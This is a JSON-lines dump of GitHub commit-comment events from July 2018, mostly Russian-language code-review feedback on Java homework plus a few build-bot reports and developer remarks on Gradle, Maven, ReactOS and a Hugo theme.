{"id":"7966998908","type":"CommitCommentEvent","actor":{"login":"erkinalp"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29711801,"position":774,"line":883,"path":"boot/freeldr/freeldr/lib/fs/btrfs.c","commit_id":"61d2c58640635b7786d62199ec5fdd08d6a71c3c","created_at":"2018-07-15T08:11:57Z","updated_at":"2018-07-15T08:11:57Z","author_association":"NONE","body":"Why not full case sensitivity by default? As you have not implemented a FAT to btrfs converter, no compatibility issues can arise from full case sensitivity."}},"created_at":"2018-07-15T08:11:57Z"}
{"id":"7966999194","type":"CommitCommentEvent","actor":{"login":"Tlapi"},"repo":{"name":"ctf0/laravel-mix-versionhash"},"payload":{"comment":{"id":29711802,"position":null,"line":null,"path":null,"commit_id":"aef89d9b0fdebe573779af83a9dc867568d52338","created_at":"2018-07-15T08:12:14Z","updated_at":"2018-07-15T08:12:14Z","author_association":"NONE","body":"@ctf0 Look good!"}},"created_at":"2018-07-15T08:12:14Z"}
{"id":"7966999900","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711804,"position":45,"line":45,"path":"src/lesson2/Task3.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:12:52Z","updated_at":"2018-07-15T08:12:52Z","author_association":"NONE","body":"лучше сразу инициализировать переменные, да и потом, в твоем случае можно было сделать сразу \r\nreturn b * b - 4 * a * c;"}},"created_at":"2018-07-15T08:12:52Z"}
{"id":"7967000652","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29711805,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T08:13:35Z","updated_at":"2018-07-15T08:13:35Z","author_association":"CONTRIBUTOR","body":"In the meantime you could move the Moditect plugin to your release profile as a quick fix."}},"created_at":"2018-07-15T08:13:35Z"}
{"id":"7967001347","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29711807,"position":83,"line":83,"path":"kafka-broker/build.gradle","commit_id":"81a0d7d92641688e63826841a22d9e9919943b21","created_at":"2018-07-15T08:14:14Z","updated_at":"2018-07-15T08:14:14Z","author_association":"OWNER","body":"Tried to use [**Gradle Spawn Plugin**](https://github.com/marc0der/gradle-spawn-plugin), but the SpawnProcessTask was not spawn another process from the current gradle process."}},"created_at":"2018-07-15T08:14:14Z"}
{"id":"7967002056","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711809,"position":27,"line":27,"path":"src/lesson2/Task3.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:14:52Z","updated_at":"2018-07-15T08:14:52Z","author_association":"NONE","body":"если дискриминант отрицательный, то и нет смысла дальше выполнять программу, делаешь сразу выход из метода main - return например, а лучше просто в if (d > 0) и если положительный, то засунуть дальнейшее вычисление задачи"}},"created_at":"2018-07-15T08:14:52Z"}
{"id":"7967003091","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29711814,"position":null,"line":null,"path":null,"commit_id":"c87bf9331a7bc31925043526d71ed947dbb7bd8c","created_at":"2018-07-15T08:15:41Z","updated_at":"2018-07-15T08:15:41Z","author_association":"COLLABORATOR","body":"Englischer Originalstring:\r\n\"This theme isn't compatible with the version of MIUI installed on your device. Some parts of MIUI might not work properly if you apply this theme.\"\r\nAm besten das 10 komplett weglassen, dann passt es für jede neue MIUI Version. 👍 "}},"created_at":"2018-07-15T08:15:41Z"}
{"id":"7967003317","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711816,"position":60,"line":60,"path":"src/lesson2/Task3.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:15:53Z","updated_at":"2018-07-15T08:15:53Z","author_association":"NONE","body":"код не отформатирован "}},"created_at":"2018-07-15T08:15:53Z"}
{"id":"7967004177","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711817,"position":56,"line":56,"path":"src/lesson2/Task3.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:16:40Z","updated_at":"2018-07-15T08:16:40Z","author_association":"NONE","body":"во всех функциях своих ты каждый раз вычисляешь заново дискриминант и передаешь 3 параметра. А можно было передавать уже вычисленный в самом начале дискриминант. Иначе не оптимально написана программа"}},"created_at":"2018-07-15T08:16:40Z"}
{"id":"7967005820","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711822,"position":16,"line":16,"path":"src/lesson3/Task1.java","commit_id":"cbc958afb62ad26a8e7e075b674cc2b3130fd64b","created_at":"2018-07-15T08:18:14Z","updated_at":"2018-07-15T08:18:14Z","author_association":"NONE","body":"используй лучше более короткие записи: +=, /="}},"created_at":"2018-07-15T08:18:14Z"}
{"id":"7967006420","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711824,"position":21,"line":21,"path":"src/lesson3/Task1.java","commit_id":"cbc958afb62ad26a8e7e075b674cc2b3130fd64b","created_at":"2018-07-15T08:18:49Z","updated_at":"2018-07-15T08:18:49Z","author_association":"NONE","body":"функция main должна быть вверху класса, класс должен читаться как книга"}},"created_at":"2018-07-15T08:18:49Z"}
{"id":"7967006583","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29711828,"position":34,"line":34,"path":"zipkin-service/build.gradle","commit_id":"81a0d7d92641688e63826841a22d9e9919943b21","created_at":"2018-07-15T08:18:58Z","updated_at":"2018-07-15T08:18:58Z","author_association":"OWNER","body":"Specify argument [zipkin.collector.kafka.bootstrap-servers](https://github.com/openzipkin/zipkin/tree/master/zipkin-autoconfigure/collector-kafka) for Zipkin server to connect to Kafka message broker."}},"created_at":"2018-07-15T08:18:58Z"}
{"id":"7967006970","type":"CommitCommentEvent","actor":{"login":"mrhut10"},"repo":{"name":"cezerin/cezerin"},"payload":{"comment":{"id":29711830,"position":null,"line":null,"path":null,"commit_id":"96a287d44922e20301e436b5901174b9b21f9398","created_at":"2018-07-15T08:19:23Z","updated_at":"2018-07-15T08:19:23Z","author_association":"CONTRIBUTOR","body":"yay awesome to have some of my code in the comunity :)"}},"created_at":"2018-07-15T08:19:23Z"}
{"id":"7967007449","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711833,"position":12,"line":12,"path":"src/lesson3/Task1.java","commit_id":"cbc958afb62ad26a8e7e075b674cc2b3130fd64b","created_at":"2018-07-15T08:19:49Z","updated_at":"2018-07-15T08:19:49Z","author_association":"NONE","body":"зачем объявлять переменную за циклов while. Тем самым увеличиваешь область видимости ее, так делать плохо, область видимости должна быть как можно меньше, поэтому помещай ее в while"}},"created_at":"2018-07-15T08:19:49Z"}
{"id":"7967008350","type":"CommitCommentEvent","actor":{"login":"zaibos"},"repo":{"name":"ayusharma/Hackerrank"},"payload":{"comment":{"id":29711834,"position":null,"line":null,"path":null,"commit_id":"d21a8d0d6295537d8ba71f405e66774479f06c47","created_at":"2018-07-15T08:20:38Z","updated_at":"2018-07-15T08:20:38Z","author_association":"NONE","body":"this code will not pass all the test cases. "}},"created_at":"2018-07-15T08:20:38Z"}
{"id":"7967016991","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711861,"position":34,"line":34,"path":"src/lesson3/Task3.java","commit_id":"cbc958afb62ad26a8e7e075b674cc2b3130fd64b","created_at":"2018-07-15T08:28:51Z","updated_at":"2018-07-15T08:28:51Z","author_association":"NONE","body":"среднее кол-во осадков надо хранить в double, иначе потеряешь вещественную часть"}},"created_at":"2018-07-15T08:28:51Z"}
{"id":"7967018344","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29711865,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-15T08:30:05Z","updated_at":"2018-07-15T08:30:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T08:30:05Z"}
{"id":"7967019092","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"MajaMarkovic1/cars"},"payload":{"comment":{"id":29711868,"position":1,"line":1,"path":".editorconfig","commit_id":"99bd6352e669544ae3126a3571d52fa6fe3f9ff0","created_at":"2018-07-15T08:30:39Z","updated_at":"2018-07-15T08:30:39Z","author_association":"NONE","body":"U ovom fajlu ima dosta izmena koje ne znam kako su se uvukle, mozda imas kod kuce drugaciju verziju Laravel-a ili tako nesto. 🤷‍♀️ "}},"created_at":"2018-07-15T08:30:39Z"}
{"id":"7967019556","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29711869,"position":null,"line":null,"path":null,"commit_id":"242dba13b7bc97e0e7170423223fa24c6d33baac","created_at":"2018-07-15T08:31:03Z","updated_at":"2018-07-15T08:31:03Z","author_association":"OWNER","body":"```\r\n#Downtiser\r\ndef add(a,b,f):\r\n    return f(a)+f(b)\r\n\r\n\r\nprint(add(-3,-4,abs))  #将函数作为参数传入另一个函数\r\n```"}},"created_at":"2018-07-15T08:31:03Z"}
{"id":"7967019858","type":"CommitCommentEvent","actor":{"login":"keofrol"},"repo":{"name":"keofrol/ForTest"},"payload":{"comment":{"id":29711870,"position":null,"line":null,"path":null,"commit_id":"5c719258fcf60d47aabc69be4b6648ff8f5c009e","created_at":"2018-07-15T08:31:18Z","updated_at":"2018-07-15T08:31:18Z","author_association":"OWNER","body":"free comment"}},"created_at":"2018-07-15T08:31:18Z"}
{"id":"7967021047","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711874,"position":5,"line":5,"path":"Lesson2HW/Task1.java","commit_id":"58fc7829cdebb0ba2beccdb4b3519e32543b9532","created_at":"2018-07-15T08:32:21Z","updated_at":"2018-07-15T08:32:21Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T08:32:21Z"}
{"id":"7967021228","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711875,"position":7,"line":7,"path":"Lesson2HW/Task1.java","commit_id":"58fc7829cdebb0ba2beccdb4b3519e32543b9532","created_at":"2018-07-15T08:32:33Z","updated_at":"2018-07-15T08:32:33Z","author_association":"NONE","body":"не оставлять отступ в первой строчке метода"}},"created_at":"2018-07-15T08:32:33Z"}
{"id":"7967022291","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711881,"position":35,"line":35,"path":"Lesson2HW/Task1.java","commit_id":"58fc7829cdebb0ba2beccdb4b3519e32543b9532","created_at":"2018-07-15T08:33:38Z","updated_at":"2018-07-15T08:33:38Z","author_association":"NONE","body":"все надо выносить в функции. Такой код просто нечитабельный "}},"created_at":"2018-07-15T08:33:38Z"}
{"id":"7967022909","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711882,"position":17,"line":17,"path":"Lesson2HW/Task1.java","commit_id":"58fc7829cdebb0ba2beccdb4b3519e32543b9532","created_at":"2018-07-15T08:34:15Z","updated_at":"2018-07-15T08:34:15Z","author_association":"NONE","body":"расчет высокостного года неверный, мы же писали с вами функцию, вот ее и надо было использовать"}},"created_at":"2018-07-15T08:34:15Z"}
{"id":"7967023453","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711885,"position":39,"line":39,"path":"Lesson2HW/Task1.java","commit_id":"58fc7829cdebb0ba2beccdb4b3519e32543b9532","created_at":"2018-07-15T08:34:45Z","updated_at":"2018-07-15T08:34:45Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T08:34:45Z"}
{"id":"7967023727","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29711888,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-15T08:35:00Z","updated_at":"2018-07-15T08:35:00Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1687 of 1687 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.01%25-green.png)</a>\n"}},"created_at":"2018-07-15T08:35:00Z"}
{"id":"7967023946","type":"CommitCommentEvent","actor":{"login":"ch4ot1c"},"repo":{"name":"ch4ot1c/BTCP-Rebase"},"payload":{"comment":{"id":29711889,"position":null,"line":null,"path":null,"commit_id":"2747c7363191d0001d93566ded295c8491f9b6d5","created_at":"2018-07-15T08:35:12Z","updated_at":"2018-07-15T08:35:12Z","author_association":"OWNER","body":"Source: https://github.com/bitcoin/bitcoin/commit/071c95570b8e2ee5c2a4aed8b86b9b14f8e75578#diff-b2bb174788c7409b671c46ccc86034bdL198"}},"created_at":"2018-07-15T08:35:12Z"}
{"id":"7967024131","type":"CommitCommentEvent","actor":{"login":"evenyao"},"repo":{"name":"evenyao/zhidao-demo"},"payload":{"comment":{"id":29711890,"position":null,"line":null,"path":null,"commit_id":"f658dd884690c1268021f42e7245fa6b3afb95cb","created_at":"2018-07-15T08:35:24Z","updated_at":"2018-07-15T08:35:24Z","author_association":"OWNER","body":"修正了http协议不安全导致的css无法成功导入引发的iconfont不显示的问题"}},"created_at":"2018-07-15T08:35:24Z"}
{"id":"7967024507","type":"CommitCommentEvent","actor":{"login":"amirasolimanahmed"},"repo":{"name":"bulkan/robotframework-requests"},"payload":{"comment":{"id":29711891,"position":null,"line":null,"path":null,"commit_id":"79dde3061e9f7348ecb3719e31292762f04793ac","created_at":"2018-07-15T08:35:47Z","updated_at":"2018-07-15T08:35:47Z","author_association":"NONE","body":"how can i extract for example an ID from the json response ? "}},"created_at":"2018-07-15T08:35:47Z"}
{"id":"7967025318","type":"CommitCommentEvent","actor":{"login":"shaform"},"repo":{"name":"xianmin/hugo-theme-jane"},"payload":{"comment":{"id":29711894,"position":null,"line":null,"path":null,"commit_id":"b8c640535806cb23a75fc163f26278d351b4ba8e","created_at":"2018-07-15T08:36:32Z","updated_at":"2018-07-15T08:36:32Z","author_association":"CONTRIBUTOR","body":"Perhaps using `relLangURL` instead could solve the problem?\r\n\r\nIt seems that when baseURL is a root url, the menu should be set like this (without `zh-cn`):\r\n\r\n```\r\n [[languages.zh-cn.menu.main]]\r\n   name = \"归档\"\r\n   weight = 20\r\n   identifier = \"archives\"\r\n   url = \"/post/\"\r\n```\r\n\r\nOtherwise it is possible to get `/zh-cn/zh-cn/`"}},"created_at":"2018-07-15T08:36:32Z"}
{"id":"7967026659","type":"CommitCommentEvent","actor":{"login":"abhi253"},"repo":{"name":"abhi253/github-slideshow"},"payload":{"comment":{"id":29711899,"position":null,"line":null,"path":null,"commit_id":"2ba9d02708115f2fa67bdc521ccf0e77e9fffea3","created_at":"2018-07-15T08:37:40Z","updated_at":"2018-07-15T08:37:40Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-15T08:37:40Z"}
{"id":"7967027052","type":"CommitCommentEvent","actor":{"login":"lukehutch"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29711900,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T08:38:00Z","updated_at":"2018-07-15T08:38:00Z","author_association":"OWNER","body":"How do I do that, and why would it fix the issue? Sorry, I don't know even the most basic stuff about Maven. It drives me nuts with its complexity and brittleness every time I have to touch that confounded pom file."}},"created_at":"2018-07-15T08:38:00Z"}
{"id":"7967027580","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711904,"position":42,"line":42,"path":"Lesson2HW/Task2.java","commit_id":"58fc7829cdebb0ba2beccdb4b3519e32543b9532","created_at":"2018-07-15T08:38:27Z","updated_at":"2018-07-15T08:38:27Z","author_association":"NONE","body":"совсем не хочешь выносить код в функции, ужасно все смотрится, не ленись давай, мы не зря их проходили!"}},"created_at":"2018-07-15T08:38:27Z"}
{"id":"7967029803","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711907,"position":39,"line":39,"path":"Lesson2HW/Task2.java","commit_id":"58fc7829cdebb0ba2beccdb4b3519e32543b9532","created_at":"2018-07-15T08:40:35Z","updated_at":"2018-07-15T08:40:35Z","author_association":"NONE","body":"дублируешь вывод сообщения 10 раз,  не хорошо это"}},"created_at":"2018-07-15T08:40:35Z"}
{"id":"7967030755","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711913,"position":33,"line":33,"path":"Lesson2HW/Task3.java","commit_id":"58fc7829cdebb0ba2beccdb4b3519e32543b9532","created_at":"2018-07-15T08:41:30Z","updated_at":"2018-07-15T08:41:30Z","author_association":"NONE","body":"ну, тыт вообще не круто, смысл задачи как раз-таки и состоял в создании 3 функций, даже написано было каких, а ты даже здесь не захотел их создавать и все наклепал в main :("}},"created_at":"2018-07-15T08:41:30Z"}
{"id":"7967031102","type":"CommitCommentEvent","actor":{"login":"danielid258"},"repo":{"name":"danielid258/config-repo"},"payload":{"comment":{"id":29711915,"position":null,"line":null,"path":null,"commit_id":"f4ee2dac1ae683bf7053c41452b4948d6a1c0fdb","created_at":"2018-07-15T08:41:50Z","updated_at":"2018-07-15T08:41:50Z","author_association":"OWNER","body":"these configurations are independent of the environment"}},"created_at":"2018-07-15T08:41:50Z"}
{"id":"7967032077","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711916,"position":10,"line":10,"path":"Lesson2HW/Task3.java","commit_id":"58fc7829cdebb0ba2beccdb4b3519e32543b9532","created_at":"2018-07-15T08:42:47Z","updated_at":"2018-07-15T08:42:47Z","author_association":"NONE","body":"смысл объявлять все переменные так высоко без инициализации? Они рассчитываются один раз у тебя почти все, область видимости должна быть как можно меньше у переменных. Лучше так:\r\ndouble a = scanner.nextDouble();"}},"created_at":"2018-07-15T08:42:47Z"}
{"id":"7967034044","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711919,"position":13,"line":13,"path":"Lesson3HW/Task1.java","commit_id":"96eceb4b12311a0f9e2910c1fefbd3c2d78f3a06","created_at":"2018-07-15T08:44:32Z","updated_at":"2018-07-15T08:44:32Z","author_association":"NONE","body":"не надо брать в скобочки (n % 10)"}},"created_at":"2018-07-15T08:44:32Z"}
{"id":"7967034536","type":"CommitCommentEvent","actor":{"login":"abuzer8700"},"repo":{"name":"DasKaktus/morse2button"},"payload":{"comment":{"id":29711920,"position":null,"line":null,"path":null,"commit_id":"6b5c2802199dc03ce25d134b0ba73f056a3edc07","created_at":"2018-07-15T08:44:59Z","updated_at":"2018-07-15T08:44:59Z","author_association":"NONE","body":"jjooop"}},"created_at":"2018-07-15T08:44:59Z"}
{"id":"7967034631","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711922,"position":16,"line":16,"path":"Lesson3HW/Task1.java","commit_id":"96eceb4b12311a0f9e2910c1fefbd3c2d78f3a06","created_at":"2018-07-15T08:45:05Z","updated_at":"2018-07-15T08:45:05Z","author_association":"NONE","body":"просто sout(sum), не надо ненужной конкотенации со строкой \" \""}},"created_at":"2018-07-15T08:45:05Z"}
{"id":"7967034826","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711923,"position":19,"line":19,"path":"Lesson3HW/Task1.java","commit_id":"96eceb4b12311a0f9e2910c1fefbd3c2d78f3a06","created_at":"2018-07-15T08:45:14Z","updated_at":"2018-07-15T08:45:14Z","author_association":"NONE","body":"форматируем код!"}},"created_at":"2018-07-15T08:45:14Z"}
{"id":"7967035018","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711926,"position":22,"line":22,"path":"Lesson3HW/Task2.java","commit_id":"96eceb4b12311a0f9e2910c1fefbd3c2d78f3a06","created_at":"2018-07-15T08:45:24Z","updated_at":"2018-07-15T08:45:24Z","author_association":"NONE","body":"ненужные пропуски строк"}},"created_at":"2018-07-15T08:45:24Z"}
{"id":"7967035453","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711928,"position":16,"line":16,"path":"Lesson3HW/Task2.java","commit_id":"96eceb4b12311a0f9e2910c1fefbd3c2d78f3a06","created_at":"2018-07-15T08:45:49Z","updated_at":"2018-07-15T08:45:49Z","author_association":"NONE","body":"названия переменным давать говорящие, иначе ничего не понятно!"}},"created_at":"2018-07-15T08:45:49Z"}
{"id":"7967035979","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29711932,"position":null,"line":null,"path":null,"commit_id":"96eceb4b12311a0f9e2910c1fefbd3c2d78f3a06","created_at":"2018-07-15T08:46:18Z","updated_at":"2018-07-15T08:46:18Z","author_association":"NONE","body":"не видел решение фибоначи с рекурсией и решение 3 задачи"}},"created_at":"2018-07-15T08:46:18Z"}
{"id":"7967036394","type":"CommitCommentEvent","actor":{"login":"namlt2882"},"repo":{"name":"namlt2882/mobile_project_summer_2018_new"},"payload":{"comment":{"id":29711933,"position":28,"line":28,"path":"app/src/main/java/project/baonq/service/LedgerService.java","commit_id":"7fa3545d5d3dbcc16b5843abd54f096c308f58d1","created_at":"2018-07-15T08:46:43Z","updated_at":"2018-07-15T08:46:43Z","author_association":"OWNER","body":"Thiếu last update. Khi tạo thì giá trị insertDate với lastUpdate bằng nhau"}},"created_at":"2018-07-15T08:46:43Z"}
{"id":"7967037119","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711935,"position":8,"line":8,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:47:23Z","updated_at":"2018-07-15T08:47:23Z","author_association":"NONE","body":"классы начинаются с большой буквы, читаем код конвеншен"}},"created_at":"2018-07-15T08:47:23Z"}
{"id":"7967037326","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711936,"position":9,"line":9,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:47:36Z","updated_at":"2018-07-15T08:47:36Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T08:47:36Z"}
{"id":"7967037641","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711939,"position":10,"line":10,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:47:54Z","updated_at":"2018-07-15T08:47:54Z","author_association":"NONE","body":"не надо делать отступ в первой строчке функции"}},"created_at":"2018-07-15T08:47:54Z"}
{"id":"7967037838","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29711940,"position":null,"line":null,"path":null,"commit_id":"629641be3cb12c2f98adffabd29f08463f96e9f8","created_at":"2018-07-15T08:48:07Z","updated_at":"2018-07-15T08:48:07Z","author_association":"COLLABORATOR","body":"Puzzle `565-edf33878` disappeared from [`src/main/java/com/zerocracy/pmo/banks/FkBank.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/banks/FkBank.java), that's why I closed #1069. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-15T08:48:07Z"}
{"id":"7967038158","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29711941,"position":null,"line":null,"path":null,"commit_id":"629641be3cb12c2f98adffabd29f08463f96e9f8","created_at":"2018-07-15T08:48:25Z","updated_at":"2018-07-15T08:48:25Z","author_association":"COLLABORATOR","body":"Puzzle `1069-c7edbb2e` discovered in   [`src/main/java/com/zerocracy/pmo/banks/FkBank.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/banks/FkBank.java)   and submitted as #1428. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-15T08:48:25Z"}
{"id":"7967038312","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711942,"position":24,"line":24,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:48:33Z","updated_at":"2018-07-15T08:48:33Z","author_association":"NONE","body":"надо было просто написать функцию, которая возвращает true-false, как мы писали на занятии, иначе плохо читается код"}},"created_at":"2018-07-15T08:48:33Z"}
{"id":"7967039075","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711944,"position":24,"line":24,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:49:15Z","updated_at":"2018-07-15T08:49:15Z","author_association":"NONE","body":"так же не надо делать return,  у тебя и так никуда программа дальше не пойдет после захода в if"}},"created_at":"2018-07-15T08:49:15Z"}
{"id":"7967039358","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29711945,"position":133,"line":133,"path":"src/lesson2/task1.java","commit_id":"4876cc90cb5821c451859036cd3626bedbb76c8d","created_at":"2018-07-15T08:49:32Z","updated_at":"2018-07-15T08:49:32Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T08:49:32Z"}
